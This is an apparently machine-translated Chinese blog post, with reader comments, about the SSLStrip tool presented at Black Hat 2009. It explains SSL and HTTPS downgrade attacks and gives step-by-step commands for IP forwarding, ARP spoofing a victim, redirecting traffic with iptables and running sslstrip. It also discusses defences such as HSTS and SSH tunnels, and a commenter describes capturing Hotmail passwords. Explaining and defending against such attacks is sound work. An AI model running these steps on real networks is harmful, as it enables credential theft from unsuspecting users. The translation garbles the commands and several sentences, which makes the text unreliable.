Moxie Marlinspike出席了 黑帽2009 一個叫做 SSL條, 針對 實際上使所有數據公開傳輸時,使用戶相信他正在使用SSL加密的網站上。 此外,SSLStrip還會欺騙Web服務器,儘管站點仍在繼續運行,但它繞過了其所謂的加密功能。
據我所知,這種方法仍然有效。 威脅仍然存在,我們都受到了威脅。 布哈哈哈... |
讓我們從基礎開始:SSL到底是什麼?
對於那些不知道的人,請使用安全套接字層(SSL; 安全套接字層協議)及其後續的傳輸層安全性(TLS;傳輸層安全性)是 在網絡上提供安全通信的加密協議,通常是互聯網。
SSL在諸如HTTP,SMTP,NNTP之類的應用程序協議之間的層上運行,並通過TCP傳輸協議運行,該協議是TCP / IP協議家族的一部分。 儘管它可以為使用信任連接的任何協議(例如TCP)提供安全性,但在大多數情況下,它與HTTP一起使用以形成HTTPS。 HTTPS 用於保護Web應用程序的萬維網頁面的安全。 電子商務,使用公共密鑰證書來驗證端點的身份。
SSLStrip…色情影片回到了“讓我們使用Linux”嗎?
的操作 SSL條 很簡單, 替換所有HTTPS請求 HTTP來訪問網頁,然後執行MITM(攻擊«中間人«)在服務器和客戶端之間。 這個想法是受害者和攻擊者通過HTTP進行通信,而攻擊者和服務器通過HTTPS與服務器的證書進行通信。 因此,攻擊者可以看到受害者的所有明文流量。
這是一個視頻,我們可以看到這個出色的工具的工作原理。
如何使用SSLStrip
1。 - 配置IP轉發
迴聲1> / proc / sys / net / ipv4 / ip_forward
2。 - 在兩台計算機之間執行ARP MITM攻擊:
arpspoof -i eth0 -t VICTIMA主機
3。 - 使用iptables重定向流量:
iptables -t nat -A路由-p tcp –目標端口80 -j重定向–至端口8080
4。 - 在使用的端口上啟動SSLStrip
python sslstrip.py -w文件
如何保護自己免受SSLStrip攻擊?
這是最美麗,最可怕的: 這不可以.
如Moxie(他的 視頻 不會浪費超過69分鐘的時間)唯一可行的解決方案是對所有HTTP連接進行加密,也就是說,無論頁面或服務如何,在其所有實例中都將通用的和通用的“ HTTP”替換為“ HTTPS” 。 正如Moxie所說:依賴不安全協議的安全協議是一個問題“。
作為用戶,您至少可以做什麼? 減少被攻擊的機會? 以偏執的方式驗證每個頁面前面是否都有一個“ https”被洩露,或者如果安裝了Firefox用戶 NoScript的 並在所有頁面上強制HTTPS連接。 但是,這只會使效果最小化,而不能否定效果。
嗯...關於https可以保護您免受快捷方式的攻擊,它是相對的。
我不知道mitm攻擊在多大程度上不能成功針對SSL連接,mitm攻擊在鏈路層上起作用,而ssl在傳輸層上起作用,因此可以捕獲數據。
很久以前,我正在對我在本地網絡中使用mitm進行的一門課程的工作進行測試,可以獲取SSL發送的數據,嘗試使用hotmail(它是ssl),它可以成功返回密碼。 試想,攻擊者冒充網關並從受害者那裡接收所有信息。
知道您的信息安全旅行的唯一方法是使用ssh隧道。
如果我感到有些迫害,該怎麼辦,就是使用ssh連接到我的服務器,通過本地端口建立隧道,打開套接字並在家中使用Internet連接在其他人的計算機上導航。
正如他們所說,除了通過Mac保護我們的dhcp並確保有誰進行連接之外,沒有其他方法可以避免這種攻擊。
嗨,在命令4中您錯過了“ -l 8080”
好的。 謝謝!
更具體地說,一旦MitM攻擊,您將無法再保護自己。 有多種保護自己免受這種攻擊的方法,儘管這很困難,因為它具有變體。
編輯:
我發現至少從2012年XNUMX月起,chrome和firefox瀏覽器(如果它們現在全部使用,我都不會感到驚訝)使用HSTS標頭。 據說,該標頭通過通知瀏覽器“第一次”嘗試連接到站點後“連接”必須始終使用SSL來解決該漏洞(這使漏洞保持在最低限度)。 此外,Chrome通過添加HSTS網站列表(可能是網絡上最受歡迎的網站)來提高安全性。 資源: http://forums.hak5.org/index.php?/topic/25322-sslstrip-not-working-with-gmail-twitter/
很好,我認為這很棒。 這個想法真的很簡單😀
也是...
當我們在網絡上有多個主機時,有人知道是否可以使用arpspoof嗎? 謝謝。